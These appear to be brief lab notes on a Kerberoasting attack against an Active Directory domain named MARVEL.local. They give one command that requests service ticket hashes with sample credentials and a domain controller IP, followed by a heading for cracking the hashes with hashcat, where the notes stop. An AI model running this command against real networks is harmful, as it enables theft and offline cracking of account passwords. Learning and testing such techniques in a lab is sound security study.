Kerberoasting Attack:
sudo GetUserSPNS.py MARVEL.local/fcastle:Password1 -dc-ip 192.168.138.136 -request
Cracking the hash obtained using hashcat: